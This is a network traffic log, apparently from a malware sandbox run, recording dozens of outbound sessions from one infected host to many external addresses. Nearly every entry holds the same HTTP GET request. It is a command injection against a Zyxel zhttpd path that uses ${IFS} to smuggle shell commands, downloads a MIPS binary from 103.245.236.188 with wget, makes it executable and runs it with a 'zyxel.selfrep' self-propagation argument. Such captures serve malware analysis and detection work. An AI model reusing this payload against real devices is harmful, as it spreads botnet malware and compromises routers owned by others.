                                                Jan 12, 2024 18:24:28.666982889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2714192.168.2.1347866150.203.116.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667042017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2715192.168.2.1345374220.159.122.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667074919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2716192.168.2.1340612135.94.100.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667115927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2717192.168.2.1334908205.148.1.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667148113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2718192.168.2.1336354178.36.178.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667206049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2719192.168.2.1341478170.73.215.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667238951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2720192.168.2.135076279.225.204.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667288065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2721192.168.2.1360822161.16.24.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667323112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2722192.168.2.1339032148.200.199.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667361975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2723192.168.2.1360620204.234.79.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667382956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2724192.168.2.1341968217.108.87.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667418957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2725192.168.2.1360600220.86.68.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667458057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2726192.168.2.1359736151.99.172.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667534113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2727192.168.2.133771868.246.125.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667573929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2728192.168.2.1352900143.166.152.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667596102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2729192.168.2.1353606218.27.155.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667642117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2730192.168.2.1344406155.69.106.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667674065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2731192.168.2.134289681.229.46.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667720079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2732192.168.2.1360888200.49.234.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667756081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2733192.168.2.13442102.80.254.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667797089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2734192.168.2.1340358143.43.210.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667834044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2735192.168.2.13574645.50.97.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667886019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2736192.168.2.1352882148.255.173.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667921066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2737192.168.2.133369245.205.248.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.667973995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2738192.168.2.1337276152.146.165.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668020964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2739192.168.2.1357504131.12.100.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668050051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2740192.168.2.1338406138.159.137.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668102026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2741192.168.2.136030249.160.255.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668133020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2742192.168.2.1358082164.242.55.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668168068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2743192.168.2.1352904155.225.174.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668200016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2744192.168.2.13580384.213.66.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668237925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2745192.168.2.134444279.47.232.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668291092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2746192.168.2.1344118177.200.66.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.668329000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2747192.168.2.1357584108.206.111.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.671890020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2748192.168.2.1356130218.129.8.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672406912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2749192.168.2.1334754203.116.62.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672491074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2750192.168.2.133488877.92.143.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672530890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2751192.168.2.1348170174.254.245.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672561884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2752192.168.2.135892263.44.87.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672626972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2753192.168.2.1343158194.158.221.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672662020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2754192.168.2.134382475.245.188.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.672694921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2755192.168.2.133349053.151.154.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681670904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2756192.168.2.1359784125.229.199.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681705952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2757192.168.2.134657469.165.244.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681765079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2758192.168.2.1348848111.44.143.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681801081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2759192.168.2.1338442126.149.175.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681830883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2760192.168.2.1357062165.215.155.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681863070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2761192.168.2.135023896.78.227.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681941032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2762192.168.2.1333902137.188.180.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681952953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2763192.168.2.134466053.183.141.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.681987047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2764192.168.2.1338390134.225.47.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682027102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2765192.168.2.13603404.167.136.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682071924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2766192.168.2.134283871.100.150.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682104111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2767192.168.2.1351756219.101.246.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682135105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2768192.168.2.134140889.248.201.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682209015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2769192.168.2.1335472205.202.206.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682266951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2770192.168.2.1332774223.108.85.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682311058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2771192.168.2.1353554140.19.67.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682348013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2772192.168.2.133510854.210.37.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682389021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2773192.168.2.1350222143.172.76.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682419062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2774192.168.2.134980048.125.183.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682456970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2775192.168.2.1341782205.53.129.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.682501078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2776192.168.2.134430466.37.16.95443
                                                TimestampBytes transferredDirectionData
